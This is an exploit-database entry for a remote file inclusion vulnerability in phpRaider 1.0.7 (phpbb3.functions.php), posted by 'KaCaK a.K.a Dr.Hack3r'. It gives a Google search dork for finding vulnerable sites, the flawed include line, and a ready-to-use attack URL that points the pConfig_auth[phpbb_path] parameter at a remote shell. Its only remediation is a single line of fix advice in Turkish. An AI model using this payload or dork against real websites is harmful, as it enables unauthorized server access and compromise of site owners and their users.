phpRaider 1.0.7 (phpbb3.functions.php) RFI Vulnerability

2008-05-24T00:00:00
ID 1337DAY-ID-3066
Type zdt
Reporter Kacak
Modified 2008-05-24T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================
phpRaider 1.0.7 (phpbb3.functions.php) RFI Vulnerability
========================================================



< ------------------- header data start ------------------- >

#############################################################

# Application Name : PhpRaider Mod phpbb3

# Vulnerable Type : Remote File Include

# Google Keyword : Powered by phpRaider v1.0.7

# Infection : Ilgili site ve sunucuya erisim saglanabilir.

# Bug Fix Advice : Undefined degerler, tan?mlanmal?d?r.

# author : KaCaK a.K.a Dr.Hack3r

# Error Code : include_once($pConfig_auth['phpbb_path'].'common.php');

Kacakizm Bir Yasam Felsefesi

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

www.site.com/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]

/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]

< -- bug code end of -- >



#  0day.today [2018-01-06]  #